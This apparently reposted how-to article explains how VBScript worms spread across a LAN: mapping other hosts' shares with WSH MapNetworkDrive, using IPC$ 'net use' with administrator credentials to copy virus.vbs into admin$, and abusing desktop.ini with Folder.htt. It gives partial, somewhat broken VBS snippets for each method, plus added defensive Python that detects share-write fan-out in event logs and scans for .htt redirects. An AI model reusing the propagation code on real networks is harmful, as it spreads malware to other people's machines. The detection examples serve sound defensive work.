
How to use the MapNetworkDrive method in WSH to script the propagation of worms

2025-01-17 Update. From: SLTechnology News&Howtos. Shulou (Shulou.com), 06/03 report.

This article explains how script worms use the MapNetworkDrive method in WSH (Windows Script Host) to spread, along with two related propagation methods that come up in real cases.

1. Use the MapNetworkDrive method in WSH. This method maps a network drive to a local drive name.

MapNetworkDrive method:

    object.MapNetworkDrive(strLocalName, strRemoteName, [bUpdateProfile], [strUser], [strPassword])

Parameters

object: WshNetwork object.

strLocalName: A string value that represents the local name of the mapped drive.

strRemoteName: A string value that represents the UNC name of the share (\\xxx\yyy).

bUpdateProfile: Optional. A Boolean value indicating whether the mapping information is stored in the current user's profile. If the supplied bUpdateProfile value is true, the mapping is stored in the user's profile (the default is false).

strUser: Optional. A string value that represents the user name. If you map the network drive with the credentials of a user other than the current user, you must provide this parameter.

strPassword: Optional. A string value that represents the user's password. If you map the network drive with the credentials of a user other than the current user, you must provide this parameter.

Description

An error occurs when you try to map a network drive that is not shared.

The main principle is: after getting the LAN address of this machine (usually 192.168.room.*), the worm maps the shared directory of another host to a local drive (such as Z:) and then copies the virus to the mapped drive, which places the virus in that host's directory. Finally, it uses the RemoveNetworkDrive method to remove the mapping so as not to be discovered.

RemoveNetworkDrive method:

    object.RemoveNetworkDrive(strName, [bForce], [bUpdateProfile])

Parameters

object: WshNetwork object.

strName: A string value that represents the name of the mapped drive to remove. The strName parameter can be either a local name or a remote name, depending on how the drive was mapped.

bForce: Optional. A Boolean value indicating whether removal of the mapped drive is forced. If the supplied bForce value is true, the method removes the connection regardless of whether the resource is in use.

bUpdateProfile: Optional. A value indicating whether the mapping is removed from the user's profile. If bUpdateProfile is provided and its value is true, the mapping is removed from the user profile. The default value for bUpdateProfile is false.

Description

If there is a mapping between the local name (drive name) and the remote name (UNC name), strName must be set to the local name. If the network path has no local name (drive letter) mapping, strName must be set to the remote name.

Here is sample VBS code:

    Set myfso = CreateObject("Scripting.FileSystemObject")
    Set WshNetwork = WScript.CreateObject("WScript.Network")
    ' unc holds the remote host and share name; it is not defined in this snippet
    WshNetwork.MapNetworkDrive "I:", "\" & unc
    ' Copy through the same FileSystemObject that was created above
    myfso.CopyFile "c:\virus.vbs", "I:\virus.vbs.txt"
    WshNetwork.RemoveNetworkDrive "I:"

2. Use an IPC$ connection. This method will probably be familiar to readers who have played with hacking. The principle is to run the commands through WScript.Shell. For more information, refer to the various beginner IPC$ attack tutorials. Only the code is provided here:

    Set objshell = WScript.CreateObject("WScript.Shell")
    Dim st, sc
    st = "net use\" & "192.168.0.1\ IPC$" & pass & "/" & "administrator"
    objshell.Run st
    sc = "copy c:\ virus.vbs\\ 192.168.0.1\ admin$"
    objshell.Run sc
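Both methods above end with the same observable result: one host writes the same script file into shares on many other hosts in a short time. The following added example (not code from the original article) shows that fan-out detection over Windows Security event 5145 records. It assumes the events have already been collected centrally and parsed into dictionaries; the host names, addresses, file names and thresholds are constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta
import ntpath

SCRIPT_EXTS = {"vbs", "vbe", "js", "jse", "wsf", "wsh", "htt"}
FILE_WRITE_DATA = 0x2  # AccessMask bit set when a file is written or created

def script_ext(name):
    """Return a script extension found anywhere after the first dot ('a.vbs.txt' -> 'vbs')."""
    parts = ntpath.basename(name).lower().split(".")[1:]
    return next((p for p in parts if p in SCRIPT_EXTS), None)

def find_fanout(events, min_targets=3, window=timedelta(minutes=10)):
    """Flag a source that writes the same script file to min_targets hosts within window."""
    groups = defaultdict(list)
    for e in events:
        if e["EventID"] != 5145 or not (int(e["AccessMask"], 16) & FILE_WRITE_DATA):
            continue
        if script_ext(e["RelativeTargetName"]) is None:
            continue
        key = (e["IpAddress"], ntpath.basename(e["RelativeTargetName"]).lower())
        groups[key].append((datetime.fromisoformat(e["Time"]), e["Computer"]))
    alerts = []
    for (src, fname), hits in groups.items():
        hits.sort()
        for i, (start, _host) in enumerate(hits):
            targets = {c for t, c in hits[i:] if t - start <= window}
            if len(targets) >= min_targets:
                alerts.append({"source": src, "file": fname, "targets": sorted(targets)})
                break
    return alerts

def ev(time, computer, ip, share, name, mask):
    return {"EventID": 5145, "Time": time, "Computer": computer, "IpAddress": ip,
            "ShareName": share, "RelativeTargetName": name, "AccessMask": mask}

# Constructed sample: 5145 events forwarded from several hosts ("Computer" = host that logged it).
SAMPLE = [
    ev("2025-01-17T09:00:05", "WS-01", "192.168.0.23", r"\\*\C$", "report.vbs.txt", "0x2"),
    ev("2025-01-17T09:00:41", "WS-02", "192.168.0.23", r"\\*\Public", r"docs\report.vbs.txt", "0x2"),
    ev("2025-01-17T09:01:30", "WS-03", "192.168.0.23", r"\\*\C$", "report.vbs.txt", "0x2"),
    ev("2025-01-17T09:02:00", "FS-01", "192.168.0.40", r"\\*\Finance", "budget.xlsx", "0x2"),
    ev("2025-01-17T09:03:00", "DC-01", "192.168.0.41", r"\\*\NETLOGON", "logon.vbs", "0x1"),
]

if __name__ == "__main__":
    for alert in find_fanout(SAMPLE):
        print(alert)
```

Event 5145 is only recorded when the "Detailed File Share" audit subcategory is enabled on the hosts being written to. The read of logon.vbs from NETLOGON is ignored because its access mask carries no write bit.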

3. Like the New Happy hour virus, spread passively through Folder.htt.

Desktop.ini: the configuration file for the active desktop.

Desktop.ini defines how the folder it sits in is displayed on the desktop or in Explorer, as well as some properties of that folder.

Key: WebViewTemplate.NT5=file://Folder.htt

The approach is to modify desktop.ini so that it points to the Folder.htt in the same directory. When the folder is opened in Web view, Folder.htt is executed according to the settings in desktop.ini. In this way, the virus can be written into Folder.htt and made to replicate constantly.
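To check a file share or disk image for this redirect, the following added example (not code from the original article) walks a directory tree, reports every desktop.ini whose WebViewTemplate key points at a .htt file, and notes whether that template exists beside it and contains a script tag. The sample tree, its section name and the function names are constructed for illustration.

```python
import os
import re
import tempfile

KEY = re.compile(r"^\s*(WebViewTemplate[^=\s]*)\s*=\s*(.+?)\s*$", re.I)
SCRIPT_TAG = re.compile(r"<\s*script\b", re.I)

def read_text(path):
    """desktop.ini may be ANSI or UTF-16 with a BOM; decode either without raising."""
    with open(path, "rb") as fh:
        data = fh.read()
    utf16 = data[:2] in (b"\xff\xfe", b"\xfe\xff")
    return data.decode("utf-16" if utf16 else "latin-1", errors="replace")

def scan(root):
    """Return one finding per desktop.ini key that points a folder's web view at a .htt file."""
    findings = []
    for folder, _dirs, files in os.walk(root):
        for ini in (f for f in files if f.lower() == "desktop.ini"):
            for line in read_text(os.path.join(folder, ini)).splitlines():
                m = KEY.match(line)
                if not m or not m.group(2).lower().endswith(".htt"):
                    continue
                name = re.split(r"[/\\]", m.group(2))[-1]
                htt = next((f for f in files if f.lower() == name.lower()), None)
                body = read_text(os.path.join(folder, htt)) if htt else ""
                findings.append({"folder": folder, "key": m.group(1), "template": name,
                                 "template_present": htt is not None,
                                 "has_script": bool(SCRIPT_TAG.search(body))})
    return findings

def make_sample(root):
    """Constructed tree: 'shared' carries the redirect, 'plain' is an ordinary folder."""
    files = {
        "shared/desktop.ini": "[constructed-section]\nWebViewTemplate.NT5=file://Folder.htt\n",
        "shared/Folder.htt": "<html><script language='VBScript'>' placeholder</script></html>",
        "plain/desktop.ini": "[.ShellClassInfo]\nIconIndex=0\n",
    }
    for rel, text in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(text)

def demo():
    with tempfile.TemporaryDirectory() as tmp:
        make_sample(tmp)
        return scan(tmp)
```

A finding is a lead for review: compare the reported Folder.htt with a known-good copy before treating the folder as infected.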
